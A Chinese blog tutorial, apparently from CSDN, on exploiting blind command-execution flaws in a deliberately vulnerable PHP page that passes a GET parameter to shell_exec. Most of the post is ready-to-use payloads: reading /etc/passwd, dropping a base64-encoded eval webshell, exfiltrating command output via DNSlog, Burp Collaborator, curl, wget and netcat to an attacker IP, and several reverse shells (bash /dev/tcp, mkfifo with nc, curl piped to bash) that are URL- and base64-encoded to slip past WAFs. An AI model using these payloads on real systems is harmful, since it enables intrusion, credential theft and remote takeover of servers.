超全的命令(代码)执行漏洞无回显的姿势总结(附带详细代码和测试分析过程)

最新推荐文章于 2024-05-03 14:53:18 发布
最新推荐文章于 2024-05-03 14:53:18 发布
阅读量1.5k 收藏 9
点赞数 2
分类专栏: # web安全 文章标签: php 安全 开发语言 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/129343487
版权

目录

漏洞代码

突破方式

重定向

dnslog外部通信

burpsuite burpcollaborator外部通信

日志监听

netcat监听

反弹shell的各种姿势

漏洞代码

<?php
@shell_exec($_GET['a']);
?>

这里使用了无回显的shell执行函数shell_exec,给html目录的权限是777

突破方式

重定向

将需要获取的内容重定向到新文件里面

eval.php?a=cat%20/etc/passwd%20>info.txt

然后访问info.txt

或者重定向一个新的webshell到该目录下

echo "PD9waHAgcGhwaW5mbygpO2V2YWwoJF9QT1NUWydjbWQnXSk/Pg=="|base64 -d >shell.php
//<?php phpinfo();eval($_POST['cmd'])?>

访问新的webshell即可

dnslog外部通信

eval.php?a=ping `whami`.tfkfae.dnslog.cn

burpsuite burpcollaborator外部通信

原理同dnslog,貌似比dnslog更加灵敏

?a=ping%20`whoami`.9lvy3js5qy3eg6b4cmtyzypl2c82wr.burpcollaborator.net

日志监听

用 curl 协议访问远程服务器 ip 的 80 端口,再到 kali 的终端查看记录即可

用一台kali监听日志

python3 -m http.server 80

执行命令

/eval.php?a=curl%20192.168.10.133/?`whoami`
/eval.php?a=wget%20192.168.10.133/?`whoami`

查看日志

/eval.php?a=curl%20192.168.10.133/?`cat%20/etc/passwd`

netcat监听

nc -lvp 8888
nc -lp 8888>./content
?a=nc%20192.168.10.133%208888%20<%20/etc/passwd

查看content.txt内容

反弹shell的各种姿势

  • bash反弹
nc -vlnp 8080
bash -i >& /dev/tcp/192.168.10.128/8080 0>&1

这里在www网页里面反弹失败,我们在服务器终端可以反弹

  • 使用指定的bash shell反弹
/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.128/8080 0>&1'

 这里需要进行URL编码

%2f%62%69%6e%2f%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%30%2e%31%32%38%2f%38%30%38%30%20%30%3e%26%31%27

此时成功在web网页反弹shell

  • curl反弹shell

攻击者启动http服务,并在站点目录下存放一个文件,里面写着bash反弹shell命令

?a=curl%20http://192.168.10.128/bashshell|bash

成功反弹到shell

  • 临时文件反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.128 8080 >/tmp/f

URL编码

%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%39%32%2e%31%36%38%2e%31%30%2e%31%32%38%20%38%30%38%30%20%3e%2f%74%6d%70%2f%66

这里同样只在终端反弹成功,在web端口反弹失败

  • base64编码
L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMTI4LzgwODAgMD4mMSc=
/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.128/8080 0>&1'
echo "L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMTI4LzgwODAgMD4mMSc=" |base64 -d |bash

URL编码

%65%63%68%6f%20%22%4c%32%4a%70%62%69%39%69%59%58%4e%6f%49%43%31%6a%49%43%64%69%59%58%4e%6f%49%43%31%70%49%44%34%6d%49%43%39%6b%5a%58%59%76%64%47%4e%77%4c%7a%45%35%4d%69%34%78%4e%6a%67%75%4d%54%41%75%4d%54%49%34%4c%7a%67%77%4f%44%41%67%4d%44%34%6d%4d%53%63%3d%22%20%7c%62%61%73%65%36%34%20%2d%64%20%7c%62%61%73%68

这里也成功在web端口反弹到shell,可以绕过部分waf

coleak
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF中ping文件执行漏洞回显反弹拿flag
拉风的鲨鱼的博客
03-31 9349
打开网页内容如下 我们来看一下核心代码 <?php include_once "code.txt"; if (isset($_POST['ip'])) { $p=$_POST['ip']; if(preg_match("/(;|`|&| |\\$|python|ruby|perl...
语言执行DOS命令回显模块
08-30
.子程序 CMD命令, 文本型, 公开, 写入要执行的DOS语句,类型:文本型 .参数 命令, 文本型 执行DOS命令并以文本型返回结果
091-从无回显命令执行到getshell的渗透测试.pdf
09-20
091-从无回显命令执行到getshell的渗透测试.pdf
[CTF]命令执行回显利用
cosmoslin的博客
02-21 7211
背景 exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果 <?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?> 判断命令是否执行 延时 利用sleep函数 cmd=ls|sleep 5 HTTP请求 目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求) VPS:nc -lvp 8888 目标主机:cm
Day58:WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
qq_61553520的博客
03-30 1265
小迪安全-Day58:WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
回显漏洞测试及SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header) 数据查询API
命令执行回显的一些姿势
zhangge3663的博客
05-31 3256
前言 最近演练遇到了拿shell后,由于是延时注入,让我极其难受。于是,学习了一下命令执行回显的一些姿势 windows环境 1.ping %USERNAME%.2plmqc.dnslog.cn 这里的%username%为用户变量 附上windows常用变量: %APPDATA% : 列出应用程序数据的默认存放位置。 %CD% : 列出当前目录。 %CLIENTNAME% : 列出联接到终端服务会话时客户端的NETBIOS名。 %CMDCMDLINE% : 列出启动当前
回显条件下的命令执行判断和利用方式研究
m0_59598029的博客
08-16 328
在渗透测试漏洞挖掘或安全研究的过程中,我们会遇到很多无回显命令执行点。面对这些无回显命令执行点,我们很难获取命令执行结果,甚至无法判断命令是否执行成功。本篇文章主要讨论面对这些无回显命令执行点时的判断和利用方法。首先我们需要知道该点是否存在命令执行漏洞,或者我们的命令是否执行成功了。这里的研判方法有很多种,最常用的是直接通过延时判断,类似我们sql注入里的时间盲注:值得一提的是,windows下并没有sleep命令,那么如何通过时间延时的方式判断windows环境下的命令执行呢?
从无回显命令执行到getshell的渗透测试
Javachichi的博客
06-02 556
事情起源于一次渗透测试,机缘巧合之下,发现了一个PHP imap远程命令执行漏洞点。但尴尬的是,这块命令执行并不会有回显,由此开始了今天的探测之旅。
Python3 执行系统命令并获取实时回显功能
09-19
主要介绍了Python3 执行系统命令并获取实时回显功能,文中通过两种方法给大家介绍了Python执行系统命令并获得输出的方法,需要的朋友可以参考下
XXE漏洞-黑白盒测试+无回显
xiaoheizi的博客
07-02 738
XML被设计是为了传输和存储数据,XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。test.dtd内容:
命令执行漏洞无回现如何渗透
m0_62202418的博客
11-25 385
3. 有两条记录,说明服务器ping了域名,则存在命令执行漏洞。2. ping 一下生成的域名。执行命令时,没有任何回显
命令执行漏洞回显如何渗透
jj_24的博客
11-21 142
回到dnslog刷新发现有回显记录就说明存在命令执行漏洞。将print删除,然后在执行发现此时没有回显。ping 127.0.0.1也没有回显。去dnslog申请一个域名。然后ping这个域名。
带外攻击
tomyyyyy
08-26 1914
带外攻击 基本概念 带内攻击 ​ 向服务器提交一个 payload,而服务器响应给我们相关的 response 信息。大家都叫它带内攻击,这些理论的东西,我们简单理解就好,这里我们就理解成单挑通信的通道为带内攻击,也就是整个测试过程或者说是交互过程,中间没有其外部的服务器参与,只有自己和目标服务器,那么就叫带内。 带外攻击(OOB) ​ 服务器用来测试盲的各种漏洞的话,则需要我们外部...
2024年Linux CentOS 环境下安装JDK的三种方法(2),2024年最新农民工看完都学会了
最新发布
2401_83947434的博客
05-03 760
为了做好运维面试路上的助攻手,特整理了上百道,让你面试不慌心不跳,高薪offer怀里抱!这次整理的面试题,本份面试集锦涵盖了1、什么是运维?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?3、现在给你三百台服务器,你怎么对他们进行管理?4、简述raid0 raid1raid5二种工作模式的工作原理及特点5、LVS、Nginx、HAproxy有什么区别?工作中你怎么选择?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?
命令执行命令执行漏洞回显如何渗透
wj33333的博客
11-21 543
命令执行漏洞回显如何渗透
命令执行漏洞没有回显如何证明
Sgirll的博客
07-19 558
yakit自带dnslog平台,申请域名,执行命令,ping一下域名,
javaweb图片上传回显的jsp和servlet完整代码
05-27
以下是一个简单的JavaWeb图片上传回显的JSP和Servlet的完整代码: 1. JSP 文件代码: ``` <!DOCTYPE html> <html> <head> <title>Image Upload and Display</title> </head> <body> <h1>Image Upload and Display</h1> <form action="ImageUploadServlet" method="post" enctype="multipart/form-data"> <input type="file" name="file" /><br/><br/> <input type="submit" value="Upload" /> </form> <br/><br/> <% if(request.getAttribute("imagePath") != null) { %> <img src="<%= request.getContextPath() %>/<%= request.getAttribute("imagePath") %>" /> <% } %> </body> </html> ``` 2. Servlet 文件代码: ``` import java.io.File; import java.io.IOException; import java.util.UUID; import javax.servlet.ServletException; import javax.servlet.annotation.MultipartConfig; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.Part; @WebServlet("/ImageUploadServlet") @MultipartConfig(fileSizeThreshold=1024*1024*2, maxFileSize=1024*1024*10, maxRequestSize=1024*1024*50) public class ImageUploadServlet extends HttpServlet { private static final long serialVersionUID = 1L; protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String imagePath = null; String appPath = request.getServletContext().getRealPath(""); String savePath = appPath + File.separator + "uploads"; File fileSaveDir = new File(savePath); if (!fileSaveDir.exists()) { fileSaveDir.mkdir(); } for (Part part : request.getParts()) { String fileName = extractFileName(part); if (fileName != null && !fileName.equals("")) { String extension = fileName.substring(fileName.lastIndexOf(".")); String uuid = UUID.randomUUID().toString(); imagePath = "uploads" + File.separator + uuid + extension; part.write(savePath + File.separator + uuid + extension); } } request.setAttribute("imagePath", imagePath); request.getRequestDispatcher("index.jsp").forward(request, response); } private String extractFileName(Part part) { String contentDisp = part.getHeader("content-disposition"); String[] items = contentDisp.split(";"); for (String s : items) { if (s.trim().startsWith("filename")) { return s.substring(s.indexOf("=") + 2, s.length()-1); } } return null; } } ``` 在这个例子中,我们使用了Servlet 3.0的@MultipartConfig注解来处理文件上传。这个注解告诉容器这个Servlet将会接收multipart/form-data类型的请求,并且指定了上传文件的大小限制。在doPost()方法中,我们首先获取应用程序的根目录,并且创建一个名为“uploads”的文件夹来保存上传的文件。然后,我们遍历所有的文件部件,提取文件名,并且生成一个唯一的UUID和文件扩展名的组合作为文件名。最后,我们将文件保存到uploads文件夹中,并且将图片路径作为请求属性存储,并且转发到JSP页面以显示上传的图片。 请注意,这里的示例代码仅供参考,您需要根据自己的需求进行修改和调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值